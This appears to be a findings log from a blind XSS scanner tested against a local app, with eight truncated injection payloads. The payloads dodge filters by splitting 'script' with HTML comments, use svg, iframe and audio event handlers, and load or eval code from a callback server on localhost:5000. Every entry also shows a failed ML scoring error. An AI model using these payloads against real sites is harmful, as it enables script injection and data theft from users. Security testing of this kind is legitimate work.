================================================================================
BLIND XSS FINDINGS
================================================================================

[1] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.56s (inj→cb)
    Payload (trunc): " >< iframe srcdoc="< scr< !-- -- >ipt >fetch('http://localhost:5000/c/1641416c-...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 1641416c-7c96-454f-a30c-6e1644135ec1
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[2] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.48s (inj→cb)
    Payload (trunc): " >< svg onload=fetch("http://localhost:5000/c/bc4883b7-a187-428f-a0d6-3d82f3cfe...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: bc4883b7-a187-428f-a0d6-3d82f3cfe42e
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[3] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.45s (inj→cb)
    Payload (trunc): javascr<!-- -->ipt:"/*'/*`/*--></noscr<!-- -->ipt></title></textarea></style></t...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 2fb3c014-96e8-4a36-ac1d-4ff40ff4b6fd
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[4] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.42s (inj→cb)
    Payload (trunc): < audio src="x" on< !-- -- >error="var a=document.createElement('scr< !-- -- >ip...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: ddaffe2c-a05c-45d3-a95d-1a5f483cb766
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[5] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.45s (inj→cb)
    Payload (trunc): var a=document.createelement("scr<!-- -->ipt");a.src="http://localhost:5000/c/c1...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: c185ad2b-fdcb-460f-847b-94bd5d80673f
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[6] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.54s (inj→cb)
    Payload (trunc): < scr< !-- -- >ipt >fetch("//localhost:5000/c/69a86191-ad3d-427e-977e-f169b34bd4...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 69a86191-ad3d-427e-977e-f169b34bd426
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[7] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.52s (inj→cb)
    Payload (trunc): < scr<!-- -->ipt >function b(){{eval(this.responseText)}};a=new XMLHttpRequest()...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 9497158e-2302-4473-b2e7-353c317ff1c8
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
[8] http://127.0.0.1:8000/comment?text=hello
    Target: text
    Delay: 0.57s (inj→cb)
    Payload (trunc): javascr<!-- -->ipt:eval('var a=document.createelement("scr<!-- -->ipt");a.src="h...
    Callback IP: 127.0.0.1
    User-Agent: python-requests/2.32.5...
    UUID: 086d8364-aec5-4b22-8ce5-731c404a2ad1
    ML: Error: X has 14 features, but StandardScaler is expecting (score=None, decision=N/A)
--------------------------------------------------------------------------------
